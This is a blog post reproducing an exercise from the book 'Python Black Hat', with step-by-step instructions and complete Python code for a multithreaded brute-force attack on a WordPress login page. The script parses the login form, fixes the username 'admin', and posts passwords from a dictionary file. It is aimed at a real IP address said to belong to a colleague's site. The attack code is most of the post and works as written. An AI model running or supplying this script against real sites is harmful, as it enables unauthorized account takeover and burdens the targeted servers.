Recently, I received a network security book "Python Black Hat" presented by the Electronic Industry Press, a total of 24 experiments in the book, and today reproduces the 14th experiment (password guessing), my test environment is MBP computer + colleague's WordPress site + Conda development environment. One thing to say, weak passwords are fragile, but complex passwords can't be guessed at all, and it is worth affirming that you need to analyze the site POST requests and responses, but it is not advisable to wait for CPU and network consumption~
AILX10
Excellent answerer in cybersecurity
Master's in Cybersecurity
Go to consult
1. Check the source code of the login page of the WordPress site
- FIRST GET REQUEST, ACCEPT ALL COOKIES RETURNED
- Parse the form element in the return page (observe the input tag, log is the username, pwd is the password, wp-submit is the submit, testcookie is the hidden cookie)
- Modify the form elements in the return page (set the username to "admin", set the password to each element in the dictionary, everything else remains the same)
- Submit a POST request
2. Download the dictionary file
3. Run the script on MBP
Reference Code:
# -*- coding: utf-8 -*-
# @Time : 2022/6/13 9:47 PM
# @Author : ailx10
# @File : wordpress_killer.py
from io import BytesIO
from lxml import etree
from queue import Queue
import requests
import sys
import threading
import time
# SUCCESS = "Welcome to WordPress!"
SUCCESS = "欢迎"
TARGET = "http://124.223.4.212/wp-login.php"
WORDLIST = "/Users/ailx10/py3hack/chapter5/cain.txt"
def get_words():
with open(WORDLIST) as f:
raw_words = f.read()
words = Queue()
for word in raw_words.split():
words.put(word)
return words
def get_params(content):
params = dict()
parser = etree.HTMLParser()
tree = etree.parse(BytesIO(content),parser=parser)
for elem in tree.findall("//input"):
name = elem.get("name")
if name is not None:
params[name] = elem.get("value",None)
return params
class Bruter:
def __init__(self,username,url):
self.username = username
self.url = url
self.found = False
print(f"\nBrute Force Attack beginning on {url}.\n")
print("Finished the setup where username = %s\n"%username)
def run_bruteforce(self,passwords):
for _ in range(10):
t = threading.Thread(target=self.web_bruter,args=(passwords,))
t.start()
def web_bruter(self,passwords):
session = requests.Session()
resp0 = session.get(self.url)
params = get_params(resp0.content)
params["log"] = self.username
while not passwords.empty() and not self.found:
time.sleep(1)
passwd = passwords.get()
print(f"Trying username/password {self.username}/{passwd:<10}")
params["pwd"] = passwd
resp1 = session.post(self.url,data=params)
if SUCCESS in resp1.content.decode():
self.found = True
print(f"\nBruteforcing successful.")
print("Username is %s"%self.username)
print("Password is %s\n"%passwd)
print("done.")
if __name__ == "__main__":
words = get_words()
b = Bruter("admin",TARGET)
b.run_bruteforce(words)
Posted on 2022-06-13 22:23